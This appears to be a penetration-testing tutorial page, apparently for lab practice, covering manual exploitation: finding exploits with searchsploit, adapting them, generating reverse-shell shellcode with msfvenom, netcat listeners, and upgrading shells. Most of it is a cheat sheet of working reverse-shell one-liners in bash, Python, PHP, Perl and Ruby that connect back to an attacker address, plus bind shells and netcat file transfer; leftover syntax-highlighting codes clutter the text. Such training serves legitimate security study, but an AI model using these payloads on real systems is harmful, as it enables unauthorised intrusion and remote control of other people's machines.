Manual Exploitation Techniques

1606070;"># SearchSploit - Local exploit database
2searchsploit apache 2.4.49
3searchsploit -x 50383    606070;"># Examine exploit
4searchsploit -m 50383    606070;"># Copy to current directory
5 
6606070;"># ExploitDB website
7606070;"># https://www.exploit-db.com
8 
9606070;"># GitHub - Often has PoC exploits
10606070;"># Search: "CVE-2021-XXXX exploit"
11606070;"># Search: "service version exploit"
12 
13606070;"># Packet Storm Security
14606070;"># https://packetstormsecurity.com
15 
16606070;"># Organize your findings
17mkdir exploits
18searchsploit -m 50383 -o exploits/

1606070;"># Common modifications needed:
2 
3606070;"># 1. Change target IP and port
4606070;"># Look for variables like:
5RHOST = 606070;">#a5d6ff;">"10.10.10.10"
6RPORT = 80
7 
8606070;"># 2. Change shell callback IP (your IP)
9LHOST = 606070;">#a5d6ff;">"10.10.14.5"
10LPORT = 4444
11 
12606070;"># 3. Update shellcode
13606070;"># Generate with msfvenom:
14msfvenom -p linux/x64/shell_reverse_tcp \
15  LHOST=10.10.14.5 LPORT=4444 -f py -b 606070;">#a5d6ff;">"\x00"
16 
17606070;"># 4. Fix syntax for Python version
18606070;"># Python 2 to 3 common issues:
19print 606070;">#a5d6ff;">"text"        # Python 2
20print(606070;">#a5d6ff;">"text")       # Python 3
21 
22raw_input()         606070;"># Python 2
23input()             606070;"># Python 3
24 
25606070;"># 5. Update library imports
26import urllib2      606070;"># Python 2
27import urllib.request  606070;"># Python 3

1606070;"># Netcat listener (your machine)
2nc -lvnp 4444
3606070;"># or with rlwrap for better shell
4rlwrap nc -lvnp 4444
5 
6606070;"># Netcat reverse shell (target)
7nc -e /bin/bash 10.10.14.5 4444
8606070;"># If -e not available:
9rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.5 4444 > /tmp/f
10 
11606070;"># Netcat bind shell (target)
12nc -lvnp 4444 -e /bin/bash
13606070;"># Connect from attacker:
14nc 10.10.10.10 4444
15 
16606070;"># Transfer files with netcat
17606070;"># Sender:
18nc -lvnp 4444 < file.txt
19606070;"># Receiver:
20nc 10.10.10.10 4444 > file.txt

1606070;"># Bash
2bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
3bash -c 606070;">#a5d6ff;">'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
4 
5606070;"># Python
6python -c 606070;">#a5d6ff;">'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
7 
8606070;"># Python 3
9python3 -c 606070;">#a5d6ff;">'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
10 
11606070;"># PHP
12php -r 606070;">#a5d6ff;">'$s=fsockopen("10.10.14.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
13 
14606070;"># Perl
15perl -e 606070;">#a5d6ff;">'use Socket;$i="10.10.14.5";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'
16 
17606070;"># Ruby
18ruby -rsocket -e 606070;">#a5d6ff;">'f=TCPSocket.open("10.10.14.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

1606070;"># Upgrade dumb shell to interactive TTY
2 
3606070;"># Python
4python -c 606070;">#a5d6ff;">'import pty; pty.spawn("/bin/bash")'
5python3 -c 606070;">#a5d6ff;">'import pty; pty.spawn("/bin/bash")'
6 
7606070;"># Background and configure terminal
8606070;"># Press Ctrl+Z
9stty raw -echo; fg
10606070;"># Press Enter twice
11 
12606070;"># Set terminal type
13export TERM=xterm
14 
15606070;"># Get terminal size on your machine
16stty size
17606070;"># Apply to shell
18stty rows 40 cols 160
19 
20606070;"># Alternative: script
21script /dev/null -c bash

What command upgrades a basic shell to interactive?